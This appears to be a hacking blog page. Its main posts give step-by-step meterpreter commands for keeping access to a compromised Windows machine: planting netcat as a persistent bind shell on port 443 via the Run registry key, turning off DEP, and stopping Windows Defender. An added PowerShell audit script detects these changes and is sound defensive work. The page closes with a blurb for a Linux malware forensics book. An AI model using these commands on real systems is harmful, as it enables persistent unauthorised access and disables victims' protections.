Thursday, 10 July 2014

How to Install Netcat Backdoor on a Remote Machine Using Metasploit


When an attacker successfully compromises a system, they need to maintain access. That is why attackers usually install a backdoor on the victim computer for future use, so they can easily reconnect to the victim computer, use its resources, and collect data from it.

1 - First, we must upload netcat to the remote system.
Command :
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

2 - Now we enumerate the registry Run key, so that netcat can be set to execute at start-up and listen on port 443.
Command :
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

3 - Add our netcat to the start-up process.
Command :
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

4 - Check whether our backdoor is in the autorun process or not.
Command :
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
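As an added defensive check (this is not part of the original post), the PowerShell audit below enumerates the Run keys for netcat-style autostart entries like the one registered above and, going beyond this post, also reports the DEP (nx) policy and the WinDefend service state that the two posts further down this page change. The key list and the pattern list are the script's own assumptions; run it in an elevated prompt so bcdedit can read the boot entry.

```powershell
# Added audit script, not from the original post.
# Assumed key list: the common autostart locations under HKLM and HKCU.
$runKeys = @(
  'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
  'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
  'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)
# Assumed pattern list: strings typical of a netcat bind shell registered for autostart
$suspicious = 'nc\.exe|ncat|netcat|-e\s+cmd\.exe|-e\s+powershell|-Ldp|-lvp'

function Get-SuspiciousRunEntries {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            # Skip the PSPath/PSParentPath/... metadata that Get-ItemProperty adds
            if ($p.Name -like 'PS*') { continue }
            if ($p.Value -match $suspicious) {
                [pscustomobject]@{ Key = $key; Name = $p.Name; Command = $p.Value }
            }
        }
    }
}

function Get-DepPolicy {
    # bcdedit prints a line such as "nx   OptIn" or "nx   AlwaysOff" for the boot entry
    $line = bcdedit /enum '{current}' | Select-String -Pattern '^\s*nx\s+(\S+)'
    if ($line) { $line.Matches[0].Groups[1].Value } else { 'unknown' }
}

function Get-DefenderState {
    # WinDefend is the Windows Defender service name used in the post below
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    if ($svc) { $svc.Status } else { 'not installed' }
}

Get-SuspiciousRunEntries | Format-Table -AutoSize
"DEP (nx) policy : $(Get-DepPolicy)"
"WinDefend       : $(Get-DefenderState)"
```

An empty table plus "OptIn" or "AlwaysOn" and "Running" is the expected clean result; a Run entry matching the pattern, "AlwaysOff", or a stopped WinDefend each correspond to one of the changes described on this page.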

Wednesday, 9 July 2014

How to stop the Data Execution Prevention (DEP) service using Metasploit in Windows


Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

Command : bcdedit.exe /set {current} nx AlwaysOff

Tuesday, 8 July 2014

How to Stop Windows Defender Service in remote pc using Metasploit


When Windows Defender is on, you're notified when spyware or other potentially unwanted software tries to install itself or run on your computer. If you use the default settings, Windows Defender also checks for new definitions (files that are used to determine if software is spyware) and automatically removes any detected item that has a recommended removal action.

Command : net stop WinDefend


Monday, 16 September 2013

Linux Malware Incident Response


Linux Malware Incident Response: A Practitioner's Guide to Forensic Collection and Examination of Volatile Data: An Excerpt from Malware Forensic Field Guide for Linux Systems

Book Details:
Pages: 134
Publisher: Syngress (March 2013)
Language: English
ISBN-10: 0124095070
ISBN-13: 978-0124095076
Format: PDF, EPUB

Book Description:
Linux Malware Incident Response is a first look at the Malware Forensics Field Guide for Linux Systems, exhibiting the first steps in investigating Linux-based incidents. The Syngress Digital Forensics Field Guides series includes companions for any digital and computer forensic investigator and analyst. Each book is a toolkit with checklists for specific tasks, case studies of difficult situations, and expert analyst tips. This compendium of tools for computer forensics analysts and investigators is presented in a succinct outline format with cross-references to supplemental appendices. It is designed to provide the digital investigator clear and concise guidance in an easily accessible format for responding to an incident or conducting analysis in a lab.

  • Presented in a succinct outline format with cross-references to included supplemental components and appendices
  • Covers volatile data collection methodology as well as non-volatile data collection from a live Linux system
  • Addresses malware artifact discovery and extraction from a live Linux system

Table of Contents
Chapter 1. Linux Malware Incident Response

Appendix A. Linux Field Guide Tool Box
Appendix B. Selected Readings
Appendix C. Interview Questions
Appendix D. Pitfalls to Avoid
Appendix E. Live Response Field Notes

Download : Linux Malware Incident Response